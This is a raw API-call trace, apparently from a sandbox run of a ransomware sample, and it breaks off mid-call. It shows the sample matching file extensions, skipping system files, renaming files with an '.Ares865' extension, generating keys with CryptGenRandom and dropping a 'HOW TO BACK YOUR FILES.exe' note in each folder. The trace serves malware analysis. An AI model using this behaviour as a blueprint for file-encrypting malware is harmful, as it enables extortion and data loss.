lstrcmpiW (lpString1="ini", lpString2="fdb") returned 1 [0065.564] lstrlenW (lpString="fic") returned 3 [0065.564] lstrcmpiW (lpString1="ini", lpString2="fic") returned 1 [0065.564] lstrlenW (lpString="flexolibrary") returned 12 [0065.564] lstrlenW (lpString="fm5") returned 3 [0065.564] lstrcmpiW (lpString1="ini", lpString2="fm5") returned 1 [0065.564] lstrlenW (lpString="fmp") returned 3 [0065.564] lstrcmpiW (lpString1="ini", lpString2="fmp") returned 1 [0065.564] lstrlenW (lpString="fmp12") returned 5 [0065.564] lstrcmpiW (lpString1="p.ini", lpString2="fmp12") returned 1 [0065.564] lstrlenW (lpString="fmpsl") returned 5 [0065.564] lstrcmpiW (lpString1="p.ini", lpString2="fmpsl") returned 1 [0065.564] lstrlenW (lpString="fol") returned 3 [0065.564] lstrcmpiW (lpString1="ini", lpString2="fol") returned 1 [0065.564] lstrlenW (lpString="fp3") returned 3 [0065.564] lstrcmpiW (lpString1="ini", lpString2="fp3") returned 1 [0065.564] lstrlenW (lpString="fp4") returned 3 [0065.564] lstrcmpiW (lpString1="ini", lpString2="fp4") returned 1 [0065.564] lstrlenW (lpString="fp5") returned 3 [0065.564] lstrcmpiW (lpString1="ini", lpString2="fp5") returned 1 [0065.564] lstrlenW (lpString="fp7") returned 3 [0065.564] lstrcmpiW (lpString1="ini", lpString2="fp7") returned 1 [0065.564] lstrlenW (lpString="fpt") returned 3 [0065.564] lstrcmpiW (lpString1="ini", lpString2="fpt") returned 1 [0065.564] lstrlenW (lpString="frm") returned 3 [0065.564] lstrcmpiW (lpString1="ini", lpString2="frm") returned 1 [0065.564] lstrlenW (lpString="gdb") returned 3 [0065.564] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0065.564] lstrlenW (lpString="gdb") returned 3 [0065.564] lstrcmpiW (lpString1="ini", lpString2="gdb") returned 1 [0065.564] lstrlenW (lpString="grdb") returned 4 [0065.564] lstrcmpiW (lpString1=".ini", lpString2="grdb") returned -1 [0065.564] lstrlenW (lpString="gwi") returned 3 [0065.564] lstrcmpiW (lpString1="ini", lpString2="gwi") returned 1 [0065.564] lstrlenW (lpString="hdb") returned 3 [0065.564] lstrcmpiW (lpString1="ini", lpString2="hdb") returned 1 [0065.565] lstrlenW (lpString="his") returned 3 [0065.565] lstrcmpiW (lpString1="ini", lpString2="his") returned 1 [0065.565] lstrlenW (lpString="ib") returned 2 [0065.565] lstrcmpiW (lpString1="ni", lpString2="ib") returned 1 [0065.565] lstrlenW (lpString="idb") returned 3 [0065.565] lstrcmpiW (lpString1="ini", lpString2="idb") returned 1 [0065.565] lstrlenW (lpString="ihx") returned 3 [0065.565] lstrcmpiW (lpString1="ini", lpString2="ihx") returned 1 [0065.565] lstrlenW (lpString="itdb") returned 4 [0065.565] lstrcmpiW (lpString1=".ini", lpString2="itdb") returned -1 [0065.565] lstrlenW (lpString="itw") returned 3 [0065.565] lstrcmpiW (lpString1="ini", lpString2="itw") returned -1 [0065.565] lstrlenW (lpString="jet") returned 3 [0065.565] lstrcmpiW (lpString1="ini", lpString2="jet") returned -1 [0065.565] lstrlenW (lpString="jtx") returned 3 [0065.565] lstrcmpiW (lpString1="ini", lpString2="jtx") returned -1 [0065.565] lstrlenW (lpString="kdb") returned 3 [0065.565] lstrcmpiW (lpString1="ini", lpString2="kdb") returned -1 [0065.565] lstrlenW (lpString="kexi") returned 4 [0065.565] lstrcmpiW (lpString1=".ini", lpString2="kexi") returned -1 [0065.565] lstrlenW (lpString="kexic") returned 5 [0065.565] lstrcmpiW (lpString1="p.ini", lpString2="kexic") returned 1 [0065.565] lstrlenW (lpString="kexis") returned 5 [0065.565] lstrcmpiW (lpString1="p.ini", lpString2="kexis") returned 1 [0065.565] lstrlenW (lpString="lgc") returned 3 [0065.565] lstrcmpiW (lpString1="ini", lpString2="lgc") returned -1 [0065.565] lstrlenW (lpString="lwx") returned 3 [0065.565] lstrcmpiW (lpString1="ini", lpString2="lwx") returned -1 [0065.565] lstrlenW (lpString="maf") returned 3 [0065.565] lstrcmpiW (lpString1="ini", lpString2="maf") returned -1 [0065.565] lstrlenW (lpString="maq") returned 3 [0065.565] lstrcmpiW (lpString1="ini", lpString2="maq") returned -1 [0065.565] lstrlenW (lpString="mar") returned 3 [0065.565] lstrcmpiW (lpString1="ini", lpString2="mar") returned -1 [0065.565] lstrlenW (lpString="marshal") returned 7 [0065.565] lstrcmpiW (lpString1="top.ini", lpString2="marshal") returned 1 [0065.565] lstrlenW (lpString="mas") returned 3 [0065.565] lstrcmpiW (lpString1="ini", lpString2="mas") returned -1 [0065.566] lstrlenW (lpString="mav") returned 3 [0065.566] lstrcmpiW (lpString1="ini", lpString2="mav") returned -1 [0065.566] lstrlenW (lpString="maw") returned 3 [0065.566] lstrcmpiW (lpString1="ini", lpString2="maw") returned -1 [0065.566] lstrlenW (lpString="mdbhtml") returned 7 [0065.566] lstrcmpiW (lpString1="top.ini", lpString2="mdbhtml") returned 1 [0065.566] lstrlenW (lpString="mdn") returned 3 [0065.566] lstrcmpiW (lpString1="ini", lpString2="mdn") returned -1 [0065.566] lstrlenW (lpString="mdt") returned 3 [0065.566] lstrcmpiW (lpString1="ini", lpString2="mdt") returned -1 [0065.566] lstrlenW (lpString="mfd") returned 3 [0065.566] lstrcmpiW (lpString1="ini", lpString2="mfd") returned -1 [0065.566] lstrlenW (lpString="mpd") returned 3 [0065.566] lstrcmpiW (lpString1="ini", lpString2="mpd") returned -1 [0065.566] lstrlenW (lpString="mrg") returned 3 [0065.566] lstrcmpiW (lpString1="ini", lpString2="mrg") returned -1 [0065.566] lstrlenW (lpString="mud") returned 3 [0065.566] lstrcmpiW (lpString1="ini", lpString2="mud") returned -1 [0065.566] lstrlenW (lpString="mwb") returned 3 [0065.566] lstrcmpiW (lpString1="ini", lpString2="mwb") returned -1 [0065.566] lstrlenW (lpString="myd") returned 3 [0065.566] lstrcmpiW (lpString1="ini", lpString2="myd") returned -1 [0065.566] lstrlenW (lpString="ndf") returned 3 [0065.566] lstrcmpiW (lpString1="ini", lpString2="ndf") returned -1 [0065.566] lstrlenW (lpString="nnt") returned 3 [0065.566] lstrcmpiW (lpString1="ini", lpString2="nnt") returned -1 [0065.566] lstrlenW (lpString="nrmlib") returned 6 [0065.566] lstrcmpiW (lpString1="op.ini", lpString2="nrmlib") returned 1 [0065.566] lstrlenW (lpString="ns2") returned 3 [0065.566] lstrcmpiW (lpString1="ini", lpString2="ns2") returned -1 [0065.566] lstrlenW (lpString="ns3") returned 3 [0065.566] lstrcmpiW (lpString1="ini", lpString2="ns3") returned -1 [0065.566] lstrlenW (lpString="ns4") returned 3 [0065.566] lstrcmpiW (lpString1="ini", lpString2="ns4") returned -1 [0065.566] lstrlenW (lpString="nsf") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="nsf") returned -1 [0065.567] lstrlenW (lpString="nv") returned 2 [0065.567] lstrcmpiW (lpString1="ni", lpString2="nv") returned -1 [0065.567] lstrlenW (lpString="nv2") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="nv2") returned -1 [0065.567] lstrlenW (lpString="nwdb") returned 4 [0065.567] lstrcmpiW (lpString1=".ini", lpString2="nwdb") returned -1 [0065.567] lstrlenW (lpString="nyf") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="nyf") returned -1 [0065.567] lstrlenW (lpString="odb") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0065.567] lstrlenW (lpString="odb") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="odb") returned -1 [0065.567] lstrlenW (lpString="oqy") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="oqy") returned -1 [0065.567] lstrlenW (lpString="ora") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="ora") returned -1 [0065.567] lstrlenW (lpString="orx") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="orx") returned -1 [0065.567] lstrlenW (lpString="owc") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="owc") returned -1 [0065.567] lstrlenW (lpString="p96") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="p96") returned -1 [0065.567] lstrlenW (lpString="p97") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="p97") returned -1 [0065.567] lstrlenW (lpString="pan") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="pan") returned -1 [0065.567] lstrlenW (lpString="pdb") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="pdb") returned -1 [0065.567] lstrlenW (lpString="pdm") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="pdm") returned -1 [0065.567] lstrlenW (lpString="pnz") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="pnz") returned -1 [0065.567] lstrlenW (lpString="qry") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="qry") returned -1 [0065.567] lstrlenW (lpString="qvd") returned 3 [0065.567] lstrcmpiW (lpString1="ini", lpString2="qvd") returned -1 [0065.567] lstrlenW (lpString="rbf") returned 3 [0065.568] lstrcmpiW (lpString1="ini", lpString2="rbf") returned -1 [0065.568] lstrlenW (lpString="rctd") returned 4 [0065.568] lstrcmpiW (lpString1=".ini", lpString2="rctd") returned -1 [0065.568] lstrlenW (lpString="rod") returned 3 [0065.568] lstrcmpiW (lpString1="ini", lpString2="rod") returned -1 [0065.568] lstrlenW (lpString="rodx") returned 4 [0065.568] lstrcmpiW (lpString1=".ini", lpString2="rodx") returned -1 [0065.568] lstrlenW (lpString="rpd") returned 3 [0065.568] lstrcmpiW (lpString1="ini", lpString2="rpd") returned -1 [0065.568] lstrlenW (lpString="rsd") returned 3 [0065.568] lstrcmpiW (lpString1="ini", lpString2="rsd") returned -1 [0065.568] lstrlenW (lpString="sas7bdat") returned 8 [0065.568] lstrcmpiW (lpString1="ktop.ini", lpString2="sas7bdat") returned -1 [0065.568] lstrlenW (lpString="sbf") returned 3 [0065.568] lstrcmpiW (lpString1="ini", lpString2="sbf") returned -1 [0065.568] lstrlenW (lpString="scx") returned 3 [0065.568] lstrcmpiW (lpString1="ini", lpString2="scx") returned -1 [0065.568] lstrlenW (lpString="sdb") returned 3 [0065.568] lstrcmpiW (lpString1="ini", lpString2="sdb") returned -1 [0065.568] lstrlenW (lpString="sdc") returned 3 [0065.568] lstrcmpiW (lpString1="ini", lpString2="sdc") returned -1 [0065.568] lstrlenW (lpString="sdf") returned 3 [0065.568] lstrcmpiW (lpString1="ini", lpString2="sdf") returned -1 [0065.568] lstrlenW (lpString="sis") returned 3 [0065.568] lstrcmpiW (lpString1="ini", lpString2="sis") returned -1 [0065.568] lstrlenW (lpString="spq") returned 3 [0065.568] lstrcmpiW (lpString1="ini", lpString2="spq") returned -1 [0065.568] lstrlenW (lpString="te") returned 2 [0065.568] lstrcmpiW (lpString1="ni", lpString2="te") returned -1 [0065.568] lstrlenW (lpString="teacher") returned 7 [0065.568] lstrcmpiW (lpString1="top.ini", lpString2="teacher") returned 1 [0065.568] lstrlenW (lpString="tmd") returned 3 [0065.568] lstrcmpiW (lpString1="ini", lpString2="tmd") returned -1 [0065.568] lstrlenW (lpString="tps") returned 3 [0065.568] lstrcmpiW (lpString1="ini", lpString2="tps") returned -1 [0065.568] lstrlenW (lpString="trc") returned 3 [0065.569] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0065.569] lstrlenW (lpString="trc") returned 3 [0065.569] lstrcmpiW (lpString1="ini", lpString2="trc") returned -1 [0065.569] lstrlenW (lpString="trm") returned 3 [0065.569] lstrcmpiW (lpString1="ini", lpString2="trm") returned -1 [0065.569] lstrlenW (lpString="udb") returned 3 [0065.569] lstrcmpiW (lpString1="ini", lpString2="udb") returned -1 [0065.569] lstrlenW (lpString="udl") returned 3 [0065.569] lstrcmpiW (lpString1="ini", lpString2="udl") returned -1 [0065.569] lstrlenW (lpString="usr") returned 3 [0065.569] lstrcmpiW (lpString1="ini", lpString2="usr") returned -1 [0065.569] lstrlenW (lpString="v12") returned 3 [0065.569] lstrcmpiW (lpString1="ini", lpString2="v12") returned -1 [0065.569] lstrlenW (lpString="vis") returned 3 [0065.569] lstrcmpiW (lpString1="ini", lpString2="vis") returned -1 [0065.569] lstrlenW (lpString="vpd") returned 3 [0065.569] lstrcmpiW (lpString1="ini", lpString2="vpd") returned -1 [0065.569] lstrlenW (lpString="vvv") returned 3 [0065.569] lstrcmpiW (lpString1="ini", lpString2="vvv") returned -1 [0065.569] lstrlenW (lpString="wdb") returned 3 [0065.569] lstrcmpiW (lpString1="ini", lpString2="wdb") returned -1 [0065.569] lstrlenW (lpString="wmdb") returned 4 [0065.569] lstrcmpiW (lpString1=".ini", lpString2="wmdb") returned -1 [0065.569] lstrlenW (lpString="wrk") returned 3 [0065.569] lstrcmpiW (lpString1="ini", lpString2="wrk") returned -1 [0065.569] lstrlenW (lpString="xdb") returned 3 [0065.569] lstrcmpiW (lpString1="ini", lpString2="xdb") returned -1 [0065.569] lstrlenW (lpString="xld") returned 3 [0065.569] lstrcmpiW (lpString1="ini", lpString2="xld") returned -1 [0065.569] lstrlenW (lpString="xmlff") returned 5 [0065.569] lstrcmpiW (lpString1="p.ini", lpString2="xmlff") returned -1 [0065.569] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\Default User\\Local Settings\\History\\desktop.ini.Ares865") returned 64 [0065.569] MoveFileExW (lpExistingFileName="C:\\Users\\Default User\\Local Settings\\History\\desktop.ini" (normalized: "c:\\users\\default user\\local settings\\history\\desktop.ini"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\History\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\history\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0065.570] CreateFileW (lpFileName="C:\\Users\\Default User\\Local Settings\\History\\desktop.ini.Ares865" (normalized: "c:\\users\\default user\\local settings\\history\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x164 [0065.571] GetFileSizeEx (in: hFile=0x164, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=145) returned 1 [0065.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x200300) returned 0x3030020 [0065.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d30d0 [0065.571] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x80) returned 0x2f0380 [0065.571] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0065.572] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0065.572] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.572] CreateFileMappingW (hFile=0x164, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x3a0, lpName=0x0) returned 0x118 [0065.574] MapViewOfFile (hFileMappingObject=0x118, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x3a0) returned 0x190000 [0065.575] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0065.576] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0065.576] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0065.576] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x6c) returned 0x2d3238 [0065.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d3238 | out: hHeap=0x2b0000) returned 1 [0065.576] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x100) returned 0x332fc8 [0065.576] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x324fc8 [0065.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x332fc8 | out: hHeap=0x2b0000) returned 1 [0065.576] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x104) returned 0x3250e0 [0065.576] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x208) returned 0x2d9938 [0065.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3250e0 | out: hHeap=0x2b0000) returned 1 [0065.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d9938 | out: hHeap=0x2b0000) returned 1 [0065.576] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x324fc8 | out: hHeap=0x2b0000) returned 1 [0065.576] UnmapViewOfFile (lpBaseAddress=0x190000) returned 1 [0065.577] CloseHandle (hObject=0x118) returned 1 [0065.577] CloseHandle (hObject=0x164) returned 1 [0065.577] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2d30d0 | out: hHeap=0x2b0000) returned 1 [0065.577] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2f0380 | out: hHeap=0x2b0000) returned 1 [0065.577] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x3030020 | out: hHeap=0x2b0000) returned 1 [0065.577] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="History.IE5", cAlternateFileName="")) returned 1 [0065.577] lstrcmpiW (lpString1="History.IE5", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.577] lstrcmpiW (lpString1="History.IE5", lpString2="aoldtz.exe") returned 1 [0065.577] lstrcmpiW (lpString1="History.IE5", lpString2=".") returned 1 [0065.577] lstrcmpiW (lpString1="History.IE5", lpString2="..") returned 1 [0065.577] lstrcmpiW (lpString1="History.IE5", lpString2="windows") returned -1 [0065.577] lstrcmpiW (lpString1="History.IE5", lpString2="bootmgr") returned 1 [0065.577] lstrcmpiW (lpString1="History.IE5", lpString2="temp") returned -1 [0065.577] lstrcmpiW (lpString1="History.IE5", lpString2="pagefile.sys") returned -1 [0065.577] lstrcmpiW (lpString1="History.IE5", lpString2="boot") returned 1 [0065.577] lstrcmpiW (lpString1="History.IE5", lpString2="ids.txt") returned -1 [0065.577] lstrcmpiW (lpString1="History.IE5", lpString2="ntuser.dat") returned -1 [0065.577] lstrcmpiW (lpString1="History.IE5", lpString2="perflogs") returned -1 [0065.577] lstrcmpiW (lpString1="History.IE5", lpString2="MSBuild") returned -1 [0065.577] lstrlenW (lpString="History.IE5") returned 11 [0065.577] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\History\\desktop.ini") returned 56 [0065.577] lstrcpyW (in: lpString1=0x2cce45a, lpString2="History.IE5" | out: lpString1="History.IE5") returned="History.IE5" [0065.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b68 [0065.577] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x72) returned 0x2c1708 [0065.577] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b70 | out: ListHead=0x2e7710, ListEntry=0x2e7b70) returned 0x2e7b50 [0065.577] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4ac9ede0, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4ac9ede0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.577] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.578] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 1 [0065.578] lstrcmpiW (lpString1="Low", lpString2="HOW TO BACK YOUR FILES.exe") returned 1 [0065.578] lstrcmpiW (lpString1="Low", lpString2="aoldtz.exe") returned 1 [0065.578] lstrcmpiW (lpString1="Low", lpString2=".") returned 1 [0065.578] lstrcmpiW (lpString1="Low", lpString2="..") returned 1 [0065.578] lstrcmpiW (lpString1="Low", lpString2="windows") returned -1 [0065.578] lstrcmpiW (lpString1="Low", lpString2="bootmgr") returned 1 [0065.578] lstrcmpiW (lpString1="Low", lpString2="temp") returned -1 [0065.578] lstrcmpiW (lpString1="Low", lpString2="pagefile.sys") returned -1 [0065.578] lstrcmpiW (lpString1="Low", lpString2="boot") returned 1 [0065.578] lstrcmpiW (lpString1="Low", lpString2="ids.txt") returned 1 [0065.578] lstrcmpiW (lpString1="Low", lpString2="ntuser.dat") returned -1 [0065.578] lstrcmpiW (lpString1="Low", lpString2="perflogs") returned -1 [0065.578] lstrcmpiW (lpString1="Low", lpString2="MSBuild") returned -1 [0065.578] lstrlenW (lpString="Low") returned 3 [0065.578] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\History\\History.IE5") returned 56 [0065.578] lstrcpyW (in: lpString1=0x2cce45a, lpString2="Low" | out: lpString1="Low") returned="Low" [0065.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x13) returned 0x2e7b88 [0065.578] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x0, Size=0x62) returned 0x2e4940 [0065.578] RtlInterlockedPushEntrySList (in: ListHead=0x2e7710, ListEntry=0x2e7b90 | out: ListHead=0x2e7710, ListEntry=0x2e7b90) returned 0x2e7b70 [0065.578] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Low", cAlternateFileName="")) returned 0 [0065.578] FindClose (in: hFindFile=0x2cd068 | out: hFindFile=0x2cd068) returned 1 [0065.578] RtlInterlockedPopEntrySList (in: ListHead=0x2e7710 | out: ListHead=0x2e7710) returned 0x2e7b90 [0065.578] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\Default User\\Local Settings\\History\\Low", iMaxLength=260 | out: lpString1="C:\\Users\\Default User\\Local Settings\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\History\\Low" [0065.578] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e4940 | out: hHeap=0x2b0000) returned 1 [0065.578] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7b88 | out: hHeap=0x2b0000) returned 1 [0065.578] lstrlenW (lpString="C:\\Users\\Default User\\Local Settings\\History\\Low") returned 48 [0065.578] lstrcatW (in: lpString1="", lpString2="C:\\Users\\Default User\\Local Settings\\History\\Low" | out: lpString1="C:\\Users\\Default User\\Local Settings\\History\\Low") returned="C:\\Users\\Default User\\Local Settings\\History\\Low" [0065.578] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0065.578] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\Default User\\Local Settings\\History\\Low\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\default user\\local settings\\history\\low\\how to back your files.exe"), bFailIfExists=1) returned 0 [0065.579] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x12c [0065.579] GetLastError () returned 0x0 [0065.579] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x336fb0 [0065.579] ReadFile (in: hFile=0x12c, lpBuffer=0x336fb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x336fb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0065.579] CloseHandle (hObject=0x12c) returned 1 [0065.579] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x336fb0 | out: hHeap=0x2b0000) returned 1 [0065.579] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0065.579] FindFirstFileW (in: lpFileName="C:\\Users\\Default User\\Local Settings\\History\\Low\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2cd068 [0065.580] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.580] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0065.580] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0065.580] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x6320600, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4acc4f40, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0065.580] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0065.580] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0065.580] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0065.580] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0065.580] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4acc4f40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x48f29da0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x1dc00, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="HOW TO BACK YOUR FILES.exe", cAlternateFileName="HOWTOB~1.EXE")) returned 1 [0065.580] lstrcmpiW (lpString1="HOW TO BACK YOUR FILES.exe", lpString2="HOW TO BACK YOUR FILES.exe") returned 0 [0065.580] FindNextFileW (in: hFindFile=0x2cd068, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4acc4f40, ftCreationTime.dwHighDateTime=0x1d56a3b, ftLastAccessTime.dwLowDateTime=0x4acc4f40, ftLastAccessTime.dwHighDateTime=0x1d56a3b, 